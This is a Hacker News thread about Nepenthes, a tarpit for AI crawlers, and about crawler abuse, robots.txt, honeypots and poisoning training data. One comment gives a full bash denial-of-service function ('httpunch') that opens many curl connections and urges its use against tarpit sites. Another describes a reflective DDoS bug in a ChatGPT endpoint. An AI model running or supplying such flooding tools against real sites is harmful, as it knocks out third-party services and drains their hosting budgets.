Back

Nepenthes is a tarpit to catch AI web crawlers

508 points20 hourszadzmo.org
bflesch18 hours ago

Haha, this would be an amazing way to test the ChatGPT crawler reflective DDOS vulnerability [1] I published last week.

Basically a single HTTP Request to ChatGPT API can trigger 5000 HTTP requests by ChatGPT crawler to a website.

The vulnerability is/was thoroughly ignored by OpenAI/Microsoft/BugCrowd but I really wonder what would happen when ChatGPT crawler interacts with this tarpit several times per second. As ChatGPT crawler is using various Azure IP ranges I actually think the tarpit would crash first.

The vulnerability reporting experience with OpenAI / BugCrowd was really horrific. It's always difficult to get attention for DOS/DDOS vulnerabilities and companies always act like they are not a problem. But if their system goes dark and the CEO calls then suddenly they accept it as a security vulnerability.

I spent a week trying to reach OpenAI/Microsoft to get this fixed, but I gave up and just published the writeup.

I don't recommend you to exploit this vulnerability due to legal reasons.

[1] https://github.com/bf/security-advisories/blob/main/2025-01-...

hassleblad2317 hours ago

I am not surprised that OpenAI is not interested if fixing this.

bflesch17 hours ago

Their security.txt email address replies and asks you to go on BugCrowd. BugCrowd staff is unwilling (or too incompetent) to run a bash curl command to reproduce the issue, while also refusing to forward it to OpenAI.

The support@openai.com waits an hour before answering with ChatGPT answer.

Issues raised on GitHub directly towards their engineers were not answered.

Also Microsoft CERT & Azure security team do not reply or care respond to such things (maybe due to lack of demonstrated impact).

permo-w15 hours ago

why try this hard for a private company that doesn't employ you?

+1
bflesch12 hours ago
manquer9 hours ago

While others (and OP) give good reasons, beyond passion and interest, those I see are typically doing this without a bounty to a build public profile to establish reputation that helps with employment or building their devopssec consulting practices.

Unlike clear cut security issues like RCEs, (D)DoS and social engineering few other classes of issues are hard to process for devopssec, it is a matter of product design, beyond the control of engineering.

Say for example if you offer but do not require 2FA usage to users, having access to known passwords for some usernames from other leaks then with a rainbow table you can exploit poorly locked down accounts.

Similarly many dev tools and data stores for ease of adoption of their cloud offerings may be open by default, i.e. no authentication, publicly available or are easy to misconfigure poorly that even a simple scan on shodan would show. On a philosophical level these security issues in product design perhaps, but no company would accept those as security vulnerabilities, thankfully this type of issues is reducing these days.

When your inbox starts filling up with reporting items like this to improve their cred, you stop engaging because the product teams will not accept it and you cannot do anything about it, sooner or later devopsec teams tend to outsource initial filtering to bug bounty programs and they obviously do not a great job of responding especially when it is one of the grayer categories.

myself24814 hours ago

Maybe it's wrecking a site they maintain or care about.

Brian_K_White59 minutes ago

At least one time it's worth going through all the motions to prove whether it is or is not actually functional, so that they can not say "no one reported a problem..." about all the problems.

You can't say they don't have a funtional process, and they are lying or disingenuous when they claim to, if you never actually tried for real for yourself at least once.

inetknght15 hours ago

Some people have passion.

khana2 hours ago

[dead]

JohnMakin17 hours ago

Nice find, I think one of my sites actually got recently hit by something like this. And yea, this kind of thing should be trivially preventable if they cared at all.

zanderwohl11 hours ago

IDK, I feel that if you're doing 5000 HTTP calls to another website it's kind of good manners to fix that. But OpenAI has never cared about the public commons.

marginalia_nu11 hours ago

Yeah, even beyond common decency, there's pretty strong incentives to fix it, as it's a fantastic way of having your bot's fingerprint end up on Cloudflare's shitlist.

dewey17 hours ago

> And yea, this kind of thing should be trivially preventable if they cared at all.

Most of the time when someone says something is "trivial" without knowing anything about the internals, it's never trivial.

As someone working close to the b2c side of a business, I can’t count the amount of times I've heard that something should be trivial while it's something we've thought about for years.

bflesch16 hours ago

The technical flaws are quite trivial to spot, if you have the relevant experience:

- urls[] parameter has no size limit

- urls[] parameter is not deduplicated (but their cache is deduplicating, so this security control was there at some point but is ineffective now)

- their requests to same website / DNS / victim IP address rotate through all available Azure IPs, which gives them risk of being blocked by other hosters. They should come from the same IP address. I noticed them changing to other Azure IP ranges several times, most likely because they got blocked/rate limited by Hetzner or other counterparties from which I was playing around with this vulnerabilities.

But if their team is too limited to recognize security risks, there is nothing one can do. Maybe they were occupied last week with the office gossip around the sexual assault lawsuit against Sam Altman. Maybe they still had holidays or there was another, higher-risk security vulnerability.

Having interacted with several bug bounties in the past, it feels OpenAI is not very mature in that regard. Also why do they choose BugCrowd when HackerOne is much better in my experience.

fc417fc80216 hours ago

> rotate through all available Azure IPs, ... They should come from the same IP address.

I would guess that this is intentional, intended to prevent IP level blocks from being effective. That way blocking them means blocking all of Azure. Too much collateral damage to be worth it.

grahamj16 hours ago

If you’re unable to throttle your own outgoing requests you shouldn’t be making any

+1
bflesch16 hours ago
jillyboel14 hours ago

now try to reply to the actual content instead of some generalizing grandstanding bullshit

michaelbuckbee17 hours ago

What is the https://chatgpt.com/backend-api/attributions endpoint doing (or responsible for when not crushing websites).

bflesch17 hours ago

When ChatGPT cites web sources in it's output to the user, it will call `backend-api/attributions` with the URL and the API will return what the website is about.

Basically it does HTTP request to fetch HTML `<title/>` tag.

They don't check length of supplied `urls[]` array and also don't check if it contains the same URL over and over again (with minor variations).

It's just bad engineering all around.

bentcorner13 hours ago

Slightly weird that this even exists - shouldn't the backend generating the chat output know what attribution it needs, and just ask the attributions api itself? Why even expose this to users?

+2
bflesch12 hours ago
JohnMakin15 hours ago

Even if you were unwilling to change this behavior on the application layer or server side, you could add a directive in the proxy to prevent such large payloads from being accepted as an immediate mitigation step, unless they seriously need that parameter to have unlimited number of urls in it (guessing they have it set to some default like 2mb and it will break at some limit, but I am afraid to play with this too much). Somehow I doubt they need that? I don't know though.

dangoodmanUT8 hours ago

has anyone tested this working? I get a 301 in my terminal trying to send a request to my site

bflesch2 hours ago

Hopefully they'd have it fixed by now. The magic of HN exposure...

mitjam6 hours ago

How can it reach localhost or is this only a placeholder for a real address?

bflesch2 hours ago

The code in the github repo has some errors to prevent script kiddies from directly copy/pasting it.

Obviously the proof-of-concept shared with OpenAI/BugCrowd didn't have such errors.

soupfordummies17 hours ago

Try it and let us know :)

m304714 hours ago

Having first run a bot motel in I think 2005, I'm thrilled and greatly entertained to see this taking off. When I first did it, I had crawlers lost in it literally for days; and you could tell that eventually some human would come back and try to suss the wreckage. After about a year I started seeing URLs like ../this-page-does-not-exist-hahaha.html. Sure it's an arms race but just like security is generally an afterthought these days, don't think that you can't be the woodpecker which destroys civilization. The comments are great too, this one in particular reflects my personal sentiments:

> the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do

a_c39 minutes ago

We need a tarpit that feed AI their own hallucination. Make the habsburg dynasty of AI a reality

Cthulhu_12 minutes ago

There was an article about that the other day having to do with image generation, and while it didn't exactly create Hapsburg chins there was definite problems after a few generations. I can't find it though :/

taikahessu19 hours ago

We had our non-profit website drained out of bandwidth and site closed temporarily (!!) from our hosting deal because of Amazon bot aggressively crawling like ?page=21454 ... etc.

Gladly Siteground restored our site without any repercussions as it was not our fault. Added Amazon bot into robots.txt after that one.

Don't like how things are right now. Is a tarpit the solution? Or better laws? Would they stop the chinese bots? Should they even? I don't know.

mrweasel56 minutes ago

> We had our non-profit website drained out of bandwidth

There is a number of sites which are having issues with scrapers (AI and others) generating so much traffic that transit providers are informing them that their fees will go up with the next contract renewal, if the traffic is not reduced. It's just very hard for the individual sites to do much about it, as most of the traffic stems from AWS, GCP or Azure IP ranges.

It is a problem and the AI companies do not care.

jsheard18 hours ago

For the "good" bots which at least respect robots.txt you can use this list to get ahead of them before they pummel your site.

https://github.com/ai-robots-txt/ai.robots.txt

There's no easy solution for bad bots which ignore robots.txt and spoof their UA though.

breakingcups13 hours ago

Such as OpenAI, who will ignore robots.txt and change their user agent to evade blocks, apparently[1]

1: https://www.reddit.com/r/selfhosted/comments/1i154h7/openai_...

zcase11 hours ago

For those looking, this is the best I've found: https://blog.cloudflare.com/declaring-your-aindependence-blo...

maeil3 hours ago

This seemed to work for some time when it came out but IME no longer does.

taikahessu18 hours ago

Thanks, will look into that!

dspillett18 hours ago

Tarpits to slow down the crawling may stop them crawling your entire site, but they'll not care unless a great many sites do this. Your site will be assigned a thread or two at most and the rest of the crawling machine resources will be off scanning other sites. There will be timeouts to stop a particular site even keeping a couple of cheap threads busy for long. And anything like this may get you delisted from search results you might want to be in as it can be difficult to reliably identify these bots from others and sometimes even real users, and if things like this get good enough to be any hassle to the crawlers they'll just start lying (more) and be even harder to detect.

People scraping for nefarious reasons have had decades of other people trying to stop them, so mitigation techniques are well known unless you can come up with something truly unique.

I don't think random Markov chain based text generators are going to pose much of a problem to LLM training scrapers either. They'll have rate limits and vast attention spreading too. Also I suspect that random pollution isn't going to have as much effect as people think because of the way the inputs are tokenised. It will have an effect, but this will be massively dulled by the randomness – statistically relatively unique information and common (non random) combinations will still bubble up obviously in the process.

I think better would be to have less random pollution: use a small set of common text to pollute the model. Something like “this was a common problem with Napoleonic genetic analysis due to the pre-frontal nature of the ongoing stream process, as is well documented in the grimoire of saint Churchill the III, 4th edition, 1969”, in fact these snippets could be Markov generated, but use the same few repeatedly. They would need to be nonsensical enough to be obvious noise to a human reader, or highlighted in some way that the scraper won't pick up on, but a general intelligence like most humans would (perhaps a CSS styled side-note inlined in the main text? — though that would likely have accessibility issues), and you would need to cycle them out regularly or scrapers will get “smart” and easily filter them out, but them appearing fully, numerous times, might mean they have more significant effect on the tokenising process than more entirely random text.

hinkley10 hours ago

If it takes them 100 times the average crawl time to crawl my site, that is an opportunity cost to them. Of course 'time' is fuzzy here because it depends how they're batching. The way most bots work is to pull a fixed number of replies in parallel per target, so if you double your response time then you halve the number of request per hour they slam you with. That definitely affects your cluster size.

However if they split ask and answered, or other threads for other sites can use the same CPUs while you're dragging your feet returning a reply, then as you say, just IO delays won't slow them down. You've got to use their CPU time as well. That won't be accomplished by IO stalls on your end, but could potentially be done by adding some highly compressible gibberish on the sending side so that you create more work without proportionately increasing your bandwidth bill. But that's could be tough to do without increasing your CPU bill.

larsrc13 hours ago

I've been considering setting up "ConfuseAIpedia" in a similar manner using sentence templates and a large set of filler words. Obviously with a warning for humans. I would set it up with an appropriate robots.txt blocking crawlers so only unethical crawlers would read it. I wouldn't try to tarpit beyond protecting my own server, as confusion rogue AI scrapers is more interesting than slowing them down a bit.

dzhiurgis13 hours ago

Can you put some topic in tarpit that you don't want LLMs to learn about? Say put bunch of info about competitor so that it learns to avoid it?

quchen19 hours ago

Unless this concept becomes a mass phenomenon with many implementations, isn’t this pretty easy to filter out? And furthermore, since this antagonizes billion-dollar companies that can spin up teams doing nothing but browse Github and HN for software like this to prevent polluting their datalakes, I wonder whether this is a very efficient approach.

marcus0x6218 hours ago

Author of a similar tool here[0]. There are a few implementations of this sort of thing that I know of. Mine is different in that the primary purpose is to slightly alter content statically using a Markov generator, mainly to make it useless for content reposters, secondarily to make it useless to LLM crawlers that ignore my robots.txt file[1]. I assume the generated text is bad enough that the LLM crawlers just throw the result out. Other than the extremely poor quality of the text, my tool doesn't leave any fingerprints (like recursive non-sense links.) In any case, it can be run on static sites with no server-side dependencies so long as you have a way to do content redirection based on User-Agent, IP, etc.

My tool does have a second component - linkmaze - which generates a bunch of nonsense text with a Markov generator, and serves infinite links (like Nepthenes does) but I generally only throw incorrigible bots at it (and, at others have noted in-thread, most crawlers already set some kind of limit on how many requests they'll send to a given site, especially a small site.) I do use it for PHP-exploit crawlers as well, though I've seen no evidence those fall into the maze -- I think they mostly just look for some string indicating a successful exploit and move on if whatever they're looking for isn't present.

But, for my use case, I don't really care if someone fingerprints content generated by my tool and avoids it. That's the point: I've set robots.txt to tell these people not to crawl my site.

In addition to Quixotic (my tool) and Napthenes, I know of:

* https://github.com/Fingel/django-llm-poison

* https://codeberg.org/MikeCoats/poison-the-wellms

* https://codeberg.org/timmc/marko/

0 - https://marcusb.org/hacks/quixotic.html

1 - I use the ai.robots.txt user agent list from https://github.com/ai-robots-txt/ai.robots.txt

btilly19 hours ago

It would be more efficient for them to spin up a team to study this robots.txt thing. They've ignored that low hanging fruit, so they won't do the more sophisticated thing any time soon.

tgv18 hours ago

You can't make money out of studying robots.txt, but you can avoid costs skipping bad web sites.

xeromal14 hours ago

Sounds like a benefit for the site owner. lol. It accomplished what they wanted.

iugtmkbdfil83415 hours ago

I forget which fiction book covered this phenomenon ( Rainbow's End? ), but the moment it becomes the basic default install ( ala adblocker in browsers for people ), it does not matter what the bigger players want to do ; they are not actively fighting against determined and possibly radicalized users.

reedf118 hours ago

The idea is that you place this in parallel to the rest of your website routes, that way your entire server might get blacklisted by the bot.

WD-4217 hours ago

Does it need to be efficient if it’s easy? I wrote a similar tool except it’s not a performance tarpit. The goal is to slightly modify otherwise organic content so that it is wrong, but only for AI bots. If they catch on and stop crawling the site, nothing is lost. https://github.com/Fingel/django-llm-poison

focusedone19 hours ago

But it's fun, right?

grajaganDev19 hours ago

I am not sure. How would crawlers filter this?

captainmuon19 hours ago

Check if the response time, the length of the "main text", or other indicators are in the lowest few percentile -> send to the heap for manual review.

Does the inferred "topic" of the domain match the topic of the individual pages? If not -> manual review. And there are many more indicators.

Hire a bunch of student jobbers, have them search github for tarpits, and let them write middleware to detect those.

If you are doing broad crawling, you already need to do this kind of thing anyway.

dylan60417 hours ago

> Hire a bunch of student jobbers,

Do people still do this, or do they just off shore the task?

marginalia_nu19 hours ago

You limit the crawl time or number of requests per domain for all domains, and set the limit proportional to how important the domain is.

There's a ton of these types of of things online, you can't e.g. exhaustively crawl every wikipedia mirror someone's put online.

pmarreck14 hours ago

It's not. It's rather pointless and frankly, nearsighted. And we can DDoS sites like this just as offensively as well simply by making many requests to it since its own docs say its Markov generation is computationally expensive, but it is NOT expensive for even 1 person to make many requests to it. Just expensive to host. So feel free to use this bash function to defeat these:

    httpunch() {
      local url=$1
      local connections=${2:-${HTTPUNCH_CONNECTIONS:-100}}
      local action=$1
      local keepalive_time=${HTTPUNCH_KEEPALIVE:-60}
      local silent_mode=false

      # Check if "kill" was passed as the first argument
      if [[ $action == "kill" ]]; then
        echo "Killing all curl processes..."
        pkill -f "curl --no-buffer"
        return
      fi

      # Parse optional --silent argument
      for arg in "$@"; do
        if [[ $arg == "--silent" ]]; then
          silent_mode=true
          break
        fi
      done

      # Ensure URL is provided if "kill" is not used
      if [[ -z $url ]]; then
        echo "Usage: httpunch [kill | <url>] [number_of_connections] [--silent]"
        echo "Environment variables: HTTPUNCH_CONNECTIONS (default: 100), HTTPUNCH_KEEPALIVE (default: 60)."
        return 1
      fi

      echo "Starting $connections connections to $url..."
      for ((i = 1; i <= connections; i++)); do
        if $silent_mode; then
          curl --no-buffer --silent --output /dev/null --keepalive-time "$keepalive_time" "$url" &
        else
          curl --no-buffer --keepalive-time "$keepalive_time" "$url" &
        fi
      done

      echo "$connections connections started with a keepalive time of $keepalive_time seconds."
      echo "Use 'httpunch kill' to terminate them."
    }
(Generated in a few seconds with the help of an LLM of course.) Your free speech is also my free speech. LLM's are just a very useful tool, and Llama for example is open-source and also needs to be trained on data. And I <opinion> just can't stand knee-jerk-anticorporate AI-doomers who decide to just create chaos instead of using that same energy to try to steer the progress </opinion>.
WD-4213 hours ago

You called the parent unintelligent yet need an LLM to show you how to run curl in a loop. Yikes.

flir4 minutes ago

"I'm not lazy, I'm efficient" - Heinlein

scudsworth9 hours ago

"Ah, my favorite ADD tech nomad! adjusts monocle"

- https://gist.github.com/pmarreck/970e5d040f9f91fd9bce8a4bcee...

Blackthorn19 hours ago

If it means it makes your own content safe when you deploy it on a corner of your website: mission accomplished!

gruez18 hours ago

>If it means it makes your own content safe

Not really? As mentioned by others, such tarpits are easily mitigated by using a priority queue. For instance, crawlers can prioritize external links over internal links, which means if your blog post makes it to HN, it'll get crawled ahead of the tarpit. If it's discoverable and readable by actual humans, AI bots will be able to scrape it.

TeMPOraL17 hours ago

[flagged]

Blackthorn16 hours ago

You've got to be seriously AI-drunk to equate letting your site be crawled by commercial scrapers with "contributing to humanity".

Maybe you don't want your your stuff to get thrown into the latest silicon valley commercial operation without getting paid for it. That seems like a valid position to take. Or maybe you just don't want Claude's ridiculously badly behaved scraper to chew through your entire budget.

Regardless, scrapers that don't follow the rules like robots.txt pretty quickly will discover why those rules exist in the first place as they receive increasing amounts of garbage.

benlivengood13 hours ago

A little humorous; it's a 502 Bad Gateway error right now and I don't know if I am classified as an AI web crawler or it's just overloaded.

marginalia_nu11 hours ago

The reason these types of slow-response tarpits aren't recommended is that you're basically building an instrument for denial of service for your own website. What happens is the server is the one that ends up holding a bunch of slow connections, many more so than any given client.

hartator19 hours ago

There are already “infinite” websites like these on the Internet.

Crawlers (both AI and regular search) have a set number of pages they want to crawl per domain. This number is usually determined by the popularity of the domain.

Unknown websites will get very few crawls per day whereas popular sites millions.

Source: I am the CEO of SerpApi.

dawnerd17 hours ago

Looking at my logs for all of my sites and this isn’t a global truth. I see multiple ai crawlers hammering away requesting the same pages many, many times. Perplexity and Facebook are basically nonstop.

jonatron17 hours ago

I just looked at the logs for a site, and I saw PerplexityBot is looking at the robots.txt and ignoring it. They don't provide a list of IPs to verify if it is actually them. Anyway, just for anyone with PerplexityBot in their user agent, they can get increasingly bad responses until the abuse stops.

dawnerd15 hours ago

Perplexity is exceptionally bad because they say they respect the robots.txt but clearly don't. When pressed on it they basically shrug and say too bad not put stuff in public if you don't want it crawled. They got a UA block in cloudflare and seems like that did the trick.

TeMPOraL10 hours ago

Interesting. Now they seem to claim that not only they follow robots.txt for crawling, but that they also broke under pressure and made the unfortunate decisions to have user requests follow robots.txt too.

https://www.perplexity.ai/de/hub/technical-faq/how-does-perp...

Dwedit15 hours ago

User Agent block just means they'd spoof their user agent.

hartator15 hours ago

What do you mean by many, many times?

palmfacehn17 hours ago

Even a brand new site will get hit heavily by crawlers. Amazonbot, Applebot, LLM bots, scrapers abusing FB's link preview bot, SEO metric bots and more than a few crawlers out of China. The desirable, well behaved crawlers are the only ones who might lose interest.

The typical entry point is a sitemap or RSS feed.

Overall I think the author is misguided in using the tarpit approach. Slow sites get less crawls. I would suggest using easily GZIP'd content and deeply nested tags instead. There are also tricks with XSL, but I doubt many mature crawlers will fall for that one.

marginalia_nu19 hours ago

Yeah, I agree with this. These types of roach motels have been around for decades and are at this point well understood and not much of a problem for anyone. You basically need to be able to deal with them to do any sort of large scale crawling.

The reality of web crawling is that the web is already extremely adversarial and any crawler will get every imaginable nonsense thrown at it, ranging from various TCP tar pits, compression and XML bombs, really there's no end to what people will put online.

A more resource effective technique to block misbehaving crawlers is to have a hidden link on each page, to some path forbidden via robots.txt, randomly generated perhaps so they're always unique. When that link is fetched, the server immediately drops the connection and blocks the IP for some time period.

pilif18 hours ago

> Unknown websites will get very few crawls per day whereas popular sites millions.

we're hosting some pretty unknown very domain specific sites and are getting hammered by Claude and others who, compared to old-school search engine bots also get caught up in the weeds and request the same pages all over.

They also seem to not care about response time of the page they are fetching, because when they are caught in the weeds and hit some super bad performing edge-cases, they do not seem to throttle at all and continue to request at 30+ requests per second even when a page takes more than a second to be returned.

We can of course handle this and make them go away, but in the end, this behavior will only hurt them both because they will face more and more opposition by web masters and because they are wasting their resources.

For decades, our solution for search engine bots was basically an empty robots.txt and have the bots deal with our sites. Bots behaved reasonably and intelligently enough that this was a working strategy.

Now in light of the current AI bots which from an outsider observer's viewpoint look like they were cobbled together with the least effort possible, this strategy is no longer viable and we would have to resort to provide a meticulously crafted robots.txt to help each hacked-up AI bot individually to not get lost in the weeds.

Or, you know, we just blanket ban them.

kccqzy16 hours ago

The fact that AI bots seem like they were cobbled together with the least effort possible might be related. The people responsible for these bots might have zero experience writing an old school search engine bot and have no idea of the kind of edge cases that would be encountered. They might just turn to LLMs to write their bot code which is not exactly a recipe for success.

diggan19 hours ago

> There are already “infinite” websites like these on the Internet.

Cool. And how much of the software driving these websites is FOSS and I can download and run it for my own (popular enough to be crawled more than daily by multiple scrapers) website?

gruez19 hours ago
johnisgood9 hours ago

How is that infinite if the last one is always the same? Am I misunderstanding this? I assumed it is almost like an infinite scroll or something.

+1
gruez6 hours ago
diggan18 hours ago

Aren't those finite lists? How is a scraper (normal or LLM) supposed to "get stuck" on those?

+1
gruez18 hours ago
hartator18 hours ago

Every not found pages that don’t return a 404 http header is basically an infinite trap.

It’s useless to do this though as all crawlers have a way to handle this. It’s very crawler 101.

angoragoats16 hours ago

This may be true for large, established crawlers for Google, Bing, et al. I don’t see how you can make this a blanket statement for all crawlers, and my own personal experience tells me this isn’t correct.

marginalia_nu11 hours ago

These things are so common having some way of dealing with them is basically mandatory if you plan on doing any sort of large scale crawling.

That said, crawlers are fairly bug prone, so misbehaving crawlers is also a relatively common sight. It's genuinely difficult to properly test a crawler, and useless to build it from specs, since the realities of the web are so far off the charted territory, any test you build is testing against something that's far removed from what you'll actually encounter. With real web data, the corner cases have corner cases, and the HTTP and HTML specs are but vague suggestions.

angoragoats11 hours ago

I am aware of all of the things you mention (I've built crawlers before).

My point was only that there are plenty of crawlers that don't operate in the way the parent post described. If you want to call them buggy that's fine.

p0nce16 hours ago

Brand new site with no user gets 1k request a month by bots, the CO2 cost must be atrocious.

tivert13 hours ago

> Brand new site with no user gets 1k request a month by bots, the CO2 cost must be atrocious.

Yep: https://www.energy.gov/articles/doe-releases-new-report-eval...:

> The report finds that data centers consumed about 4.4% of total U.S. electricity in 2023 and are expected to consume approximately 6.7 to 12% of total U.S. electricity by 2028. The report indicates that total data center electricity usage climbed from 58 TWh in 2014 to 176 TWh in 2023 and estimates an increase between 325 to 580 TWh by 2028.

A graph in the report says in data centers used 1.9% in 2018.

qwe----317 hours ago

This certainly violates the TOS for using Google.

swyx16 hours ago

what does this have to do with google?

dilDDoS8 hours ago

I appreciate the intent behind this, but like others have pointed out, this is more likely to DOS your own website than accomplish the true goal.

Probably unethical or not possible, but you could maybe spin up a bunch of static pages on GitHub Pages with random filler text and then have your site redirect to a random one of those instead. Unless web crawlers don’t follow redirects.

hubraumhugo14 hours ago

The arms race between AI bots and bot-protection is only going to get worse, leading to increasing infra costs while negatively impacting the UX and performance (captchas, rate limiting, etc.).

What's a reasonable way forward to deal with more bots than humans on the internet?

readyplayernull14 hours ago

It's time to level up in this arms race. Let's stop delivering html documents, use animated rendering of information that is positioned in a scene so that the user has to move elements around for it to be recognizable, like a full site captcha. It doesn't need to be overly complex for the user that can intuitively navigate even a 3D world, but will take x1000 more processing for OpenAI. Feel free to come up with your creative designs to make automation more difficult.

RamblingCTO3 hours ago

Why wouldn't a max-depth (which I always implement in my crawlers if I write any) prevent any issues you'd have? Am I overlooking something? Or does it run under the assumption that the crawlers they are targeting are so greedy that they don't have max-depth/a max number of pages for a domain?

grajaganDev19 hours ago

This keeps generating new pages to keep the crawler occupied.

Looks like this would tarpit any web crawler.

BryantD19 hours ago

It would indeed. Note the warning: "There is not currently a way to differentiate between web crawlers that are indexing sites for search purposes, vs crawlers that are training AI models. ANY SITE THIS SOFTWARE IS APPLIED TO WILL LIKELY DISAPPEAR FROM ALL SEARCH RESULTS."

jsheard19 hours ago

Real search engines respect robots.txt so you could just tell them not to enter Markov Chain Hell.

throwaway74467819 hours ago

I suspect AI crawler would also (quickly learn to) respect it also?

jsheard19 hours ago

In that case, mission accomplished.

rvnx19 hours ago

It's actually a great idea to spread malware without leaving traces too, it makes content inspection to be very difficult, view-source: to be broken and most of debugging tools, saving to .har, etc.

bugtodiffer19 hours ago

how is view source broken

rvnx19 hours ago

It waits for the whole page to load

upwardbound23 hours ago

Is Nepenthes being mirrored in enough places to keep the community going if the original author gets any DMCA trouble or anything? I'd be happy to host a mirror but am pretty busy and I don't want to miss a critical file by accident.

upwardbound23 hours ago

It looks like someone saved a copy of the downloads page and the three linked files in the wayback machine yesterday, so that's good at least. https://web.archive.org/web/20250000000000*/https://zadzmo.o...

btbuildem18 hours ago

> ANY SITE THIS SOFTWARE IS APPLIED TO WILL LIKELY DISAPPEAR FROM ALL SEARCH RESULTS

Bug, or feature, this? Could be a way to keep your site public yet unfindable.

chaara-dev18 hours ago

You can already do this with a robots.txt file

btbuildem17 hours ago

Technically speaking, yes - but it's in no way enforced, as far as I understand it's more of an honour system.

This malicious solution aligns with incentives (or, disincentives) of the parasitic actors, and might be practically more effective.

NathanKP17 hours ago

This looks extremely easy to detect and filter out. For example: https://i.imgur.com/hpMrLFT.png

In short, if the creator of this thinks that it will actually trick AI web crawlers, in reality it would take about 5 mins of time to write a simple check that filters out and bans the site from crawling. With modern LLM workflows its actually fairly simple and cheap to burn just a little bit of GPU time to check if the data you are crawling is decent.

Only a really, really bad crawl bot would fall for this. The funny thing is that in order to make something that an AI crawler bot would actually fall for you'd have to use LLM's to generate realistic enough looking content. Markov chain isn't going to cut it.

slongfield9 hours ago

The most annoying bots are the ones that mindlessly slam sites over and over, without doing any filtering. Having these kinds of tarpits out in the wild forcing people to be better behaved with their crawling bots is a feature, not a bug.

canu714 hours ago

If they need to query a trained LLM for each page they crawl, I would guess that the training cost would scale up pretty badly...

NathanKP13 hours ago

Of course you wouldn't do it for every single page. If I was designing this crawler I'd make it sample a percentage of pages, starting at 100% sample rate for a completely unknown website, decreasing the sample rate over time as more "good" pages are found relative to "bad" pages.

After a "good" page percentage threshold is exceeded, stop sampling entirely and just crawl, assuming that all content is good. After a "bad" page percentage threshold is exceeded just stop wasting your time crawling that domain entirely.

With modern models the sampling cost should be quite cheap, especially since Nepenthes has a really small page size. Now if the page was humungous that might make it harder and more expensive to put through an LLM

krior2 hours ago

> After a "bad" page percentage threshold is exceeded just stop wasting your time crawling that domain entirely.

In the words of Bush jr.: Mission accomplished!

ycombinatrix2 hours ago

So this is basically endlessh for HTTP? Why not feed AI web crawlers with nonsense information instead?

pera19 hours ago

Does anyone know if there is anything like Nepenthes but that implements data poisoning attacks like https://arxiv.org/abs/2408.02946

gruez18 hours ago

I skimmed the paper and the gist seems to be: if you fine-tune a foundation model on bad training data, the resulting model will produce bad outputs. That seems... expected? This makes as much sense as "if you add vulnerable libraries to your app, your app will be vulnerable". I'm not sure how this can turn into an actual attack though.

griomnib10 hours ago

A simpler approach I’m considering is just sending 100 garbage HTTP requests for each garbage HTTP request they send me. You could just have a cron job parse the user agents from access logs once an hour and blast the bastards.

nerdix13 hours ago

Are the big players (minus Google since no one blocks google bot) actively taking measures to circumvent things like Cloudflare bot protection?

Bot detection is fairly sophisticated these days. No one bypasses it by accident. If they are getting around it then they are doing it intentionally (and probably dedicating a lot of resources to it). I'm pro-scraping when bots are well behaved but the circumvention of bot detection seems like a gray-ish area.

And, yes, I know about Facebook training on copyrighted books so I don't put it above these companies. I've just never seen it confirmed that they actually do it.

luckylion13 hours ago

Not that I've seen it.

If you enable Cloudflare Captcha, you'll see basically no more bots, only the most persistent remain (that have an active interest in you/your content and aren't just drive-by-hits).

It's just that having the brief interception hurts your conversion rate. Might depend on industry, but we saw 20-30% drops in page views and conversions which just makes it a nuclear option when you're under attack, but not something to use just to block annoyances.

sedatk4 hours ago

Both ChatGPT 4o and Claude 3.5 Sonnet can identify the generated page content as "random words".

marckohlbrugge17 hours ago

OpenAI doesn’t take security seriously.

I reported a vulnerability to them that allowed you to get IP addresses of their paying customers.

OpenAI responded “Not applicable” indicating they don’t think it was a serious issue.

The PoC was very easy to understand and simple to replicate.

Edit: I guess I might as well disclose it here since they don’t consider it an issue. They were/are(?) hot linking logo images of third-party plugins. When you open their plugin store it loads a couple dozen of them instantly. This allows those plugin developers (of which there are many) to track the IP addresses and possibly more of who made these requests. It’s straight forward to become a plugin developer and get included. IP tracking is invisible to the user and OpenAI. A simple fix is to proxy these images and/or cache them on the OpenAI server.

griomnib10 hours ago

What do they take seriously?

ggm6 hours ago

Wouldn't it be better to perform random early drop in the path. Surely better slowdown than forced time delays in your own server?

mmaunder18 hours ago

To be truly malicious it should appear to be valuable content but rife with AI hallucinogenics. Best to generate it with a low cost model and prompt the model to trip balls.

griomnib10 hours ago

Ohhhh, just lots and lots of code with subtle bugs!

Dwedit15 hours ago

The article claims that using this will "cause your site to disappear from all search results", but the generated pages don't have the traditional "meta" tags that state the intention to block robots.

<meta name="robots" content="noindex, nofollow">

Are any search engines respecting that classic meta tag?

jorams14 hours ago

Yes, all the big search engines respect that meta tag. Some of the big abusive AI crawlers do too, kind of defeating the (stated) point of the tarpit.

DigiEggz17 hours ago

Amazing project. I hope to see this put to serious use.

As a quick note and not sure if it's already been mentioned, but the main blurb has a typo: "... go back into a the tarpit"

phito18 hours ago

As a carnivorous plant enthusiast, I love the name.

kerkeslager17 hours ago

Question: do these bots not respect robots.txt?

I haven't added these scrapers to my robots.txt on the sites I work on yet because I haven't seen any problems. I would run something like this on my own websites, but I can't see selling my clients on running this on their websites.

The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.

0xf00ff00f17 hours ago

> The websites I run generally have a honeypot page which is linked in the headers and disallowed to everyone in the robots.txt, and if an IP visits that page, they get added to a blocklist which simply drops their connections without response for 24 hours.

I love this idea!

griomnib10 hours ago

Yeah, this is elegant as fuck.

jonatron17 hours ago

You haven't seen any problems because you created a solution to the problem!

throw_m23933917 hours ago

> Question: do these bots not respect robots.txt?

No they don't, because there is no potential legal liability for not respecting that file in most countries.

reginald7816 hours ago

Is there a reason people can't use hashcash or some other proof of work system on these bad citizen crawlers?

ddmma3 hours ago

Server extension package

anocendi17 hours ago

Similar concept to SpiderTrap tool infosec folks use for active defense.

davidw18 hours ago

Is the source code hosted somewhere in something like GitHub?

monkaiju6 hours ago

Fantastic! Hopefully this not only leads to model collapse but also damages the search engines who have broken the contract they had with site makers.

klez18 hours ago

Not to be confused with the apparently now defunct Nepenthes malware honeypot.

I used to use it when I collected malware.

Archived site: https://web.archive.org/web/20090122063005/http://nepenthes....

Github mirror: https://github.com/honeypotarchive/nepenthes

rvz18 hours ago

Good.

We finally have a viable mouse trap for LLM scrapers for them to continuously scrape garbage forever, depleting the host of their resources whilst the LLM is fed garbage which the result will be unusable to the trainer, accelerating model collapse.

